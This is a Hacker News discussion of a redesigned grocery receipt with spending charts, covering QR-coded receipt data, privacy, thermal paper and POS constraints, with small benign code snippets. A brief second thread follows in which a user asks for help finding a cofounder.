would be _logical_ for you to like it, but I'll believe you actually do when
you make choices reflecting the preference. Which you'll never have a chance
to do unless some store's marketing department thinks this is a good idea.
~~~
IggleSniggle
You are right, I am disagreeing on the basis of speculation based on my own
experiences and preferences. I assumed you were making an argument from the
same place? That said, you are right, we will likely never have the
opportunity to test this particular preference.
So, from the place of my personal experience: I am a sucker like everyone else,
and prefer stores that tell me a per-unit price that I can compare like-to-
like brands, often to the point of irrationality. I will also grant that I
could have a backlash on this if it makes the receipts unduly long, which is a
reason for me to prefer RiteAid over CVS. Plenty of reasons not to like this.
I just don't _personally_ believe that drawing attention to price would be a
reason for me to stop shopping at a place, although it would (hopefully) alter
my buying habits within said store.
~~~
firethief
> You are right, I am disagreeing on the basis of speculation based on my own
> experiences and preferences. I assumed you were making an argument from the
> same place?
Actually, no. I too think I have logical preferences and would prefer the
additional information--but I don't think typical shoppers would respond well
to it, possibly including myself (because I don't know if I would act in
accordance with my estimation of my hypothetical preferences). So I'm making
my argument from psychological principles, and in particular by inferring what
supermarkets know about the psychology of typical shoppers (because I'm not an
expert, but I assume the people the big supermarkets consult to stay
competitive are the best in the field).
> So, from the place of my personal experience: I am sucker like everyone
> else, and prefer stores that tell me a per-unit price that I can compare
> like-to-like brands, often to the point of irrationality.
If that's what people actually want, stores have no idea what they're doing.
The supermarket where I usually shop uses different units for the "unit
prices" of different brands, so if I want to compare unit prices I have to do
the math myself. The information they highlight tends to be the "sales", which
serve to: convey a feeling of beating the system (even when they're so common,
taking the sale obviously just means not paying the sucker price); and
constantly invalidate all previous price comparisons for commodities like
coffee where in-depth price comparison would otherwise make sense.
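Doing that unit-price math yourself is trivial to script once everything is normalized to a common unit — a throwaway sketch, where the prices and the hand-rolled conversion table are made up for illustration:

```javascript
// Normalize shelf "unit prices" quoted in different units so two brands
// can be compared directly. All numbers here are made up for illustration.
const GRAMS = { g: 1, kg: 1000, oz: 28.3495, lb: 453.592 };

// Price per 100 g, given a price quoted per (amount, unit).
function per100g(price, amount, unit) {
  return (price / (amount * GRAMS[unit])) * 100;
}

const brandA = per100g(7.99, 12, "oz"); // quoted at $7.99 per 12 oz
const brandB = per100g(11.49, 1, "lb"); // quoted at $11.49 per lb
const cheaper = brandA <= brandB ? "brand A" : "brand B";
```

The same idea works for fl oz vs litres, sheets, washes — whatever mismatched basis the shelf tags happen to use.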
> I just don't _personally_ believe that drawing attention to price would be a
> reason for me to stop shopping at a place, although it would (hopefully)
> alter my buying habits within said store.
I wouldn't expect anyone would think they'd be unhappy to have the additional
information, because people consistently assume their behavior is logical. Ha.
------
MatekCopatek
This might be a local thing, but in my experience shops work hard to obfuscate
the receipts as much as possible. If they're competing on price, their tactic
is usually to promote a few random products they have the best price on and
then hope you'll pick their store to buy all your groceries. For that reason,
they are absolutely against giving you raw data, because that would allow you
to make a shopping list and find the store with the best total price.
I remember some people tried to do an app that would let you scan receipts and
make comparisons, but they gave up. Even stores from the same huge chain would
have different prices for the same item and a different name on the printed
receipt as well. I don't want to get into conspiracy theory territory, but it
looked very deliberate.
Eastern Europe here BTW.
~~~
behringer
My thoughts exactly? Why would any store ever want this? It's completely
against their interests. They want to sell high priced/high margin items. They
don't want customers shamed into spending less on bakery and alcohol and other
non-essentials.
Likewise customers might feel alienated seeing how much data they're giving to
the store and feeling bad for spending 20 percent of their meat budget on a
rib eye.
If you want to follow your food buying habits this closely, get an app. I
think it'd be weird to have this receipt. I mean I'd have to shred the thing
before I'd even be comfortable throwing it away!
~~~
henrikeh
For what it is worth, Føtex, one of the largest supermarket chains in Denmark,
prints the receipt with the items ordered in categories.
myth_buster
I'm surprised by the reception this is getting.
I may be wrong here, but my approach to this would be completely counter to
the one taken. Instead of overhauling POS systems (which are painful/tedious
to do), I would try to build an OCR app that reads the items and does all that
viz in the app, saving some paper and ink in the process.
In addition to the above constraint with POS systems, I don't have a one-stop
shop for getting all items in one category (say groceries).
~~~
mnort9
Your solution may be the better product, but info on the receipt has 100% user
adoption compared to the extreme minority that will put in the extra work to
download the app, scan the receipt, etc. Distribution is the big win here.
~~~
weberc2
If you overhaul the system to provide those data via an API (instead of OCR-
ing receipts or printing these relatively useless visualizations), then not
only could DIY folks like the parent and myself do the analyses ourselves, but
any number of personal finance tools could also support the system to make it
easy for their customers to visualize their own data.
------
guelo
I was hoping this was about removing the toxic chemicals from thermal printer
paper used for receipts. I refuse to touch that stuff and I warn cashiers that
they should wash their hands often.
~~~
rsl7
So you're that person. I love it. Keep it up.
------
noer
I don't understand how a bubble chart based on percentage of the total from
various departments fixes receipts? Knowing the percentage of my total that
comes from a specific department isn't a problem I have, though maybe it is
for others. I'd be more interested in being able to self categorize my
purchases and breaking down the percentage that way.
------
thiscatis
I'd rather have them digitally. Also, can we stop with the "just did x"
titles.
~~~
smn1234
How do you contest a wrongly scanned quantity while in person? It's less
effective to seek reimbursement after leaving the shop.
Are you suggesting an app connected to the register that shows the scanning
activity live, and somehow retains all of that as a digital copy?
~~~
mijamo
If you pay by card it could just be handled by Visa for instance. That would
be neat.
And it doesn't mean you wouldn't be able to get a paper copy in addition if
you want.
------
philpowell
I usually like fresh takes on traditional, utilitarian design. But this has
left me cold. For two main reasons:
1\. This is trying to fix a problem which doesn't exist for 99% of people. A
family struggling to figure out the math of feeding their kids with ~$0 will
not recognise "mindful" shopping.
2\. There are much better problems to solve in retail. Store design is
confrontational and manipulative. Fix that first. Then fix packaging and
presentation so that we all understand a bit more about what we're buying and
how we can cook stuff. Then create meal deals which match ingredients, rather
than pre-packs.
But I think the main reason this idea felt like the lowest of low-hanging
fruit, is this: I'm severely sight impaired, and, on occasion, I still get
shouted at by staff when I can't negotiate an automated checkout easily, or I
don't understand a chocolate-pimping deal they are pushing at checkout.
Customer service is focused on "service", not "customers". Fix that first,
then create pretty reciept graphs.
------
sametmax
Love it.
It's missing a qrcode with a date, uuid, total, tax and unguessable url to the
items list and prices (or gzipped json of it) so that we can finally scan and
import receipts with software.
Qr codes should be mandatory on most paper docs IMO. Forms, invoices,
contracts, etc.
~~~
fwip
You'd like to mandate that all stores keep a permanent record of every
purchase ever made?
~~~
anoncake
No need for that.
30 bits to represent the 13 digit IAN.
3 bytes for prices up to 167772.16. If you frequently buy things more
expensive than that, just have one of your servants transcribe the receipt to
your favorite format.
1 byte for the number of items. If you buy more than 255 of one thing, we'll
just add another line to the receipt.
That's 60 bits per line item. A QR code holds up to 23,648 bits. That makes up
to 394 line items per QR code, without compression, which ought to be enough
for anyone.
If you do buy more than that, the POS crashes^H prints another QR code.
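For what it's worth, the budget above is easy to sanity-check in a few lines of Python. Two small caveats: the three fields as listed sum to 62 bits rather than 60, and a full 13-digit number strictly needs 44 bits rather than 30 — though the conclusion (hundreds of line items per code) still holds:

```python
import math

# Field widths as proposed above
EAN_BITS = 30      # claimed width for the 13-digit article number
PRICE_BITS = 24    # 3 bytes -> prices up to 167,772.16
COUNT_BITS = 8     # 1 byte -> up to 255 of one item

BITS_PER_ITEM = EAN_BITS + PRICE_BITS + COUNT_BITS  # 62, not 60
QR_MAX_BITS = 23_648  # binary-mode capacity of a version-40 QR code

print(BITS_PER_ITEM)                 # 62
print(QR_MAX_BITS // BITS_PER_ITEM)  # 381 line items per code

# Strictly, a full 13-digit number needs 44 bits, not 30:
print(math.ceil(math.log2(10**13)))  # 44
```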
~~~
uponcoffee
>3 bytes for prices up to 167772.16. If you frequently buy things more
expensive than that, just have one of your servants transcribe the receipt to
your favorite format.
>1 byte for the number of items. If you buy more than 255 of one thing, we'll
just add another line to the receipt.
You could split prices greater than 167772.16 into chunks, delimited by using
zero for the number of items in the subsequent line items.
~~~
anoncake
I think it's simpler to make the field variable length. The same is necessary
for the count field, buying >= 256 grams of something is common.
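A variable-length field like this is usually done LEB128-style — 7 payload bits per byte, with the high bit as a continuation flag. A minimal sketch (the function names are just illustrative):

```python
def encode_varint(n: int) -> bytes:
    """LEB128-style: 7 payload bits per byte, high bit set on all but the last."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)         # final byte, high bit clear
            return bytes(out)

def decode_varint(data: bytes) -> int:
    n, shift = 0, 0
    for byte in data:
        n |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            break
    return n

# Small counts cost one byte; even a full 13-digit EAN fits in seven.
assert len(encode_varint(12)) == 1
assert len(encode_varint(9999999999999)) == 7
assert decode_varint(encode_varint(9999999999999)) == 9999999999999
```

This is the same encoding Protocol Buffers uses for integers, so a receipt format built this way would spend bytes only where the values actually need them.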
------
the_arun
Instead, what if receipts just include a QR code to a web page giving all
kinds of details? Customers could save them or integrate them with their
personal financial management service.
~~~
niteshade
My thoughts exactly, this approach helps with the issue of anonymous purchases
(i.e. retailers linking payments with email addresses[0]) although presumably
retailers will try and make up for it by shoving analytics on the receipt
display page, though that can also be disabled with an adblocker.
[0]:
[https://www.theguardian.com/travel/shortcuts/2016/oct/16/sho...](https://www.theguardian.com/travel/shortcuts/2016/oct/16/shops-
sign-up-e-receipts-proof-of-purchase)
------
dugluak
Receipt should be just data. Mixing analytics in it seems to be overkill.
Making it easy to feed the data to a separate analytics app seems to be a
better idea so that consumers can analyze their spending not only for that
particular instance of purchase but also over a period of time.
------
psukhedelos
Good on Susie! There's something really cool and fun about integrating data
visualisation into an old school receipt.
My question is, what prevents itemisation in bank statements directly?
I have always wanted for my itemised purchases to show up directly in my bank
account (instead of just the total). From there, I could see how much I am
spending by either automatically generated or manually defined categories. One
step further would allow me to budget my money not into separate accounts but
by category (think sub-folders within your accounts). You can define the
limits of a category and transactions are declined when you've hit your budget
and attempt a purchase of that category / product type.
Is there any argument to be made for the bank not having access to the
individual purchases (e.g. privacy concerns, too much data)?
Are account holders with a grasp and control of their money and spending not
more beneficial to a bank / businesses (not an expert, so forgive me if this
is a bit naive)?
I think some third party apps attempt to solve this, but as far as I'm aware
they are more of a view of your accounts and not able to control transactions
/ spending limits. Personally I'd also rather not give my buying information
to another entity.
~~~
JohnFen
> I have always wanted for my itemised purchases to show up directly in my
> bank account (instead of just the total).
I 100% do not want this, ever, period.
~~~
pbhjpbhj
Why not?
~~~
ColinWright
See the sibling comment in this thread:
[https://news.ycombinator.com/item?id=19903991](https://news.ycombinator.com/item?id=19903991)
> _I can 't get my head around the fact that you are actually suggesting this.
> Do you want your bank to know that you buy 30-40 bottles of beer each week?
> Do you want them to know that you buy medicine for a terminal disease during
> your visit to discuss a family home loan?_
~~~
pbhjpbhj
Seems like the store could use your public key to encrypt the data it uploads
to your bank, they get the full data, you decrypt it. It's then just using the
current channels.
But, I imagine it's easier to have the store make a temporary xml/json file on
their servers, give you the QR code to access it, then you can control the
data flow from then.
------
Theodores
I have wondered before why it is that you can't buy groceries with a
'compelling receipt' that shows you other database fields. Everything has
calories/sugar/salt/fat etc. in a per 100g form (measurements are different in
USA). So you could checkout some online shopping and see how many calories you
are getting for your money.
If you wanted to improve your shopping you could see what was being wasted on
'empty calories' and remove it from the order. Just being to sort the checkout
by 'most salt/100g' would be interesting to me and plenty of people who do
diets.
However, this would not help most people to click the 'buy now' button.
So it is for this reason this receipt idea has to go. Receipts only really
have to be read by people who do tax expense forms. Fancy receipts have been
possible for years now - you could have a full colour receipt with pictures of
everything, all fonts 'on brand', as fancy as it gets. But no retailer has
decided to do this, there is something for the receipt we know being the
throwaway thing it is.
------
sccxy
My self-service supermarket kiosk has option for "no receipt".
I register with my bonus card and can look all my receipts online.
No need to waste paper. It is 2019 after all.
------
robohamburger
A QR code or something similar I could scan and get the receipt in csv would
fix receipts for me.
~~~
Nerada
Exactly what I want out of a receipt. Exactly.
Just a QR code that translates to a csv of items and their costs.
------
joezydeco
I don't quite get the bargraph. So it's charting the price of everything
relative to the most expensive item in the ticket?
What happens if I buy a $100 bottle of wine and the rest is small priced
cheeses and vegetables for a party? It becomes useless.
~~~
arkades
> What happens if I buy a $100 bottle of wine and the rest is small priced
> cheeses and vegetables for a party? It becomes useless.
Do you find this an everyday event?
~~~
joezydeco
No, just an outlier example. A way to show that graphing things like this
would make Tufte's teeth grind.
------
stedaniels
Flux [0] in the UK are currently trying to irradiate the paper receipt. It's
integrated with Monzo bank too. IIRC there's an API to do whatever you like
with the data. I imagine Monzo will start doing cool data visualisations to
help with your spending habits.
[0] [https://www.tryflux.com/](https://www.tryflux.com/)
~~~
fwip
Irradiate?
~~~
bloopernova
eradicate
------
weberc2
I would be content if there was an easy way to get the raw itemization info so
I could load it into any system I want to do any analysis I want. Instead of
breakdowns per trip I could get breakdowns per month or per annum. I could
also choose from a variety of visualizations instead of being beholden to
whatever is printed on the receipt.
------
cyberferret
This reminds me of a design competition a few years ago that I saw in a
magazine, where prominent designers were hired to redesign the simple, common,
every day invoice layout.
The results were a hideous, arty, mess that almost every business surveyed
with the samples said were unreadable and would increase the workload on their
accounts staff. All they wanted was a simple layout with the invoice number
and date somewhere on the top right, then the total amount and the tax
breakdown somewhere on the bottom right.
That facilitated data entry into their own accounting system for later
processing. If they wanted to query a specific thing on the invoice, that was
a secondary consideration, but even then, they wanted things laid out simply
so they could find the line item, see the price (and quantity) and the line
total. That was it. Something the common, everyday invoice layout does well
today.
The problems I have with this concept (and this comes from over 20 years of
installing Point of Sale systems), is that a lot of POS systems these days
still print the receipt items as they are scanned (to save time, I guess). So
having the bubble chart at the top would be impossible as you don't have all
that data until the entire transaction is finished.
Also, when the customer gets this receipt, the transaction is over. This is
after the fact. It is really hard to 'undo' anything, and any learning about
spending patterns will be forgotten by the time they next do a shopping run in
a few days.
Another thing - I frequently have blow outs in my shopping, but that is
usually when I tend to treat myself to a special item, or perhaps purchase a
new frying pan etc. as part of my normal food shopping. This would result in a
large bubble or bar on my receipt, whilst negating other more important things
to a much smaller scale.
For example, last week my fresh veg bar looked like: [======....] but today it
looks like [==.......] next to my very expensive tub of foie gras that I
impulsively purchased as a treat or for a party. I may have bought the same
_quantity_ of vegetables, but visually it looks like I really skimped on them
this time around.
I applaud designers such as this OP who try and push the traditional
boundaries and expectations, but sometimes, a little more real world
experience and application would save everyone a lot of time. This is akin to
a non-pilot enthusiastically putting forward and promoting that circular
runway idea from a couple of years ago.
------
barking
When I find a receipt, the first thing I often want to know is its date, so
that if it's old I can just dump it. This can be really frustrating, as the
date can be anywhere on the tiny piece of paper. There should be a receipts
standard that everyone has to comply with, so everything is always in the same
place.
~~~
frosted-flakes
Anywhere, and in one of a dozen formats.
------
dugluak
The only utility of a receipt for me is just so that I can make returns.
Otherwise I simply trash them.
------
brucetribbensee
But don't touch the paper!
[https://www.plasticpollutioncoalition.org/pft/2016/12/23/is-...](https://www.plasticpollutioncoalition.org/pft/2016/12/23/is-
bpa-on-thermal-paper-a-health-hazard)
------
djmobley
Looks like a lot of ink wasted on a visualisation which is of limited benefit
to the consumer, and likely to result in lost revenue for the retailer, as
people become more aware of how much they are spending on particular product
categories.
~~~
narrowtux
Thermal paper does not use ink, nothing would be wasted even if printing 100%
black.
~~~
NeonVice
A waste of ink, no, but somewhat a waste of thermal paper.
~~~
post_break
If we're going to talk about wasting thermal paper CVS should be the company
we're going after.
------
Doubl
Thermal printers are the ones where the text becomes invisible over time I
believe. They should be outlawed as a way of providing anything of record. My
credit union gives them as their way of giving you your statement.
~~~
jjtheblunt
there are other papers from as recent as the early 1990s which were used for
receipts, in the US anyway, which also fade.
------
vitiell0
Interesting seeing so many people asking for digital receipt data.
Cooklist lets you connect your loyalty cards and automatically download all
your past and future purchases into one place. (like Mint.com for grocery)
You can see aggregations of all your grocery spending across retailers plus
see recipe ideas to cook with the groceries you bought.
We've thought about introducing more advanced visualization of grocery
spending or an export tool if anyone is interested.
Disclaimer: I'm a cofounder at [https://cooklist.co](https://cooklist.co)
------
m463
What people don't get is:
receipts are not for customers.
They prevent a crooked cashier from pretending to ring something up and
pocketing the cash.
Ever seen those signs? "If you didn't get a receipt, your meal is free"
~~~
JohnFen
> They prevent a crooked cashier from pretending to ring something up and
> pocketing the cash.
How?
A receipt would only be useful for that if the customer diligently looks for
an omission. I'll bet that rarely happens. What seems more likely is that the
customer will notice that they were charged more than what the total on the
receipt said, and will demand that the store refund the "extra charge".
~~~
m463
I meant everything you just purchased, not a line item (although that's a
clever variation but you might still be caught)
The idea is that there's a history of the transaction in the register to get
the receipt (so it happened), and it was handed to someone and they might read
it.
~~~
JohnFen
I still don't understand how a receipt helps for this use case. Can you
explain in a bit more detail?
------
ortusdux
I feel a better solution would be a QR code at the bottom that combines each
product's UPC and price with the name of the store, date, etc. From there it
would be easy to feed that into an app. Whoever created the app could fund it
by selling the consumer spending habit data. They could incentivise the app's
use by providing analytics, directing consumers to cheaper alternatives and
integrating coupons.
~~~
rtkwe
It'll have to be a link to a webpage/API. Thermal printers won't get you good
enough resolution to put that much in a QR code for anything but a very small
purchase with only a few items.
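A rough way to see the constraint: assuming a typical 203 dpi thermal head with ~72 mm of printable width (576 dots), the printer dots available per QR module shrink fast as the code version grows:

```python
# Rough feasibility check: printer dots available per QR module.
PRINT_DOTS = 576  # ~72 mm printable width at 203 dpi (typical 80 mm printer)

def dots_per_module(version: int) -> float:
    modules = 17 + 4 * version  # QR side length in modules, per the spec
    return PRINT_DOTS / modules

print(dots_per_module(10))  # ~10 dots/module: comfortable to scan
print(dots_per_module(40))  # ~3.25 dots/module: marginal at best
```

Even though a version-40 code physically fits on the paper, roughly 3 dots per module leaves almost no margin for thermal-print bleed — which is the practical limit described above.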
------
dragonwriter
The visualizations aren't particularly useful, and it creates a longer and
thereby slower to scan receipt. Overall, it's a negative to me.
------
rhizome
Receipt designs from an employee of a company that does not create receipts, I
can't think of better evidence of boredom.
The most helpful receipt redesign is already here at Raley's: print on both
sides of the paper.
[https://www.raleys.com/news/raleys-register-receipts-go-
doub...](https://www.raleys.com/news/raleys-register-receipts-go-double-
sided/)
------
hapidjus
Where I do most of my grocery shopping, they send the receipts to my email. I
guess you could make a third-party service to better visualize them. Any
suggestions for other improvements, or companies that already have great
receipts?
I know there are services that can connect to your bank and categorize your
purchases but it would be great to have a finer granularity. Perhaps you could
just forward all receipt emails.
------
octocode
Adding these black bars and bubble charts makes the receipt three times longer
than it needs to be. Printing millions of these a year would be a huge waste
for something that hardly anyone would look at. The side-by-side picture in
this article has the "new" receipt cropped off at the bottom, showing only
_half_ of the things that were purchased on the same amount of paper. Add all
of the pricing information, addresses, etc. and that full receipt would be
insanely long.
Receipt paper is already an environmental nightmare. Let's not add more of it.
~~~
dugluak
I certainly don't want them on my CVS receipts.
------
ErikAugust
I came for a QR code that scanned to some new open standard for receipts.
Instead, I am disappointed.
------
krustyburger
I would love to see this design adopted by major retailers. If that were to
happen, could Ms. Lu receive any compensation for her contribution? I gather
that the profit motive was far from her mind but this idea could still turn
out to be a major contribution to commerce.
------
blululu
This is great. We should use this. Listing items in order of cost alone is a
win. The bar plot is a nice touch. The category breakdown is also nice (minus
the bubble plot). I feel like this would help people budget and reduce waste.
------
mfatica
This is a solution to a non-existent problem, and not even a good one.
~~~
zwieback
Disagree, I look at my grocery shopping receipt every time to look where I
spent more than expected and I love the look of this, would even pay a couple
pennies extra to have it.
------
DanBC
This is brilliant, and I hope it gets taken up by some companies.
Sadly, I think some of them are going to look at total printing time, and
they're not going to accept longer print times.
------
jeffchien
I like some of the concepts, but in general this just seems to take more paper
(and the side-by-side photo is mildly deceptive by not showing that).
------
purplezooey
Would be nice if they also didn't print them with thermal transfer ink, which
is really bad for you when it gets on your hands (BPA).
------
JohnFen
That's a really interesting idea. I have to admit, though, that I doubt it
would make the receipt any more useful to me.
------
plantain
Why do receipts exist? Why aren't they emailed to the address attached to my
card?
~~~
JohnFen
> Why aren't they emailed to the address attached to my card?
I don't know how many people are like me, but no retailer has my email
address, and I don't use affinity cards.
------
adamwong246
I sure wish there was an app, or banking service, that automatically collects
receipts.
------
Hamuko
Where's the tax info? Has this designer ever met an accountant?
------
Sevii
Square please send me an itemized email receipt.
------
jheriko
this looks expensive.
a good design would be cheaper and make better use of the space - not waste it
------
zwieback
I love it and want it!
------
vbuwivbiu
are they BPA-free?
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Can you help me find a cofounder? - mwerty
http://www.codemug.com/hn.html
======
mrtron
Ask HN: Can you help me find a wife?
Really - a cofounder is a tight relationship that is tough to find. I wouldn't
jump into bed with a stranger :)
~~~
mwerty
Like I said, I exhausted my personal networks. Think of it as match.com when
all else fails.
Thought I'd add: I currently have two options - continue executing on an idea
by myself and hope I'll find someone soon (as a result of the execution) or
find someone first and then execute. Which would you pick?
~~~
ivey
Someone should actually make a cofounder match site.
~~~
vaksel
I'm pretty sure one exists already. I remember someone posting a link on HN to
it.
------
vaksel
You should probably be more specific in who you are looking for. Because right
now, it looks like you are looking for someone with a pulse.
At least point out some of the skills you are looking for or state if you are
looking for someone who can code or someone who is a "business guy with an
idea"
~~~
mwerty
Good point. I'm changing it now.
------
larrykubin
You graduated from UT-Austin the same year I did, but I got my degree in
Electrical Engineering. I'm still in Austin though and it sounds like you live
in Seattle.
| {
"pile_set_name": "HackerNews"
} |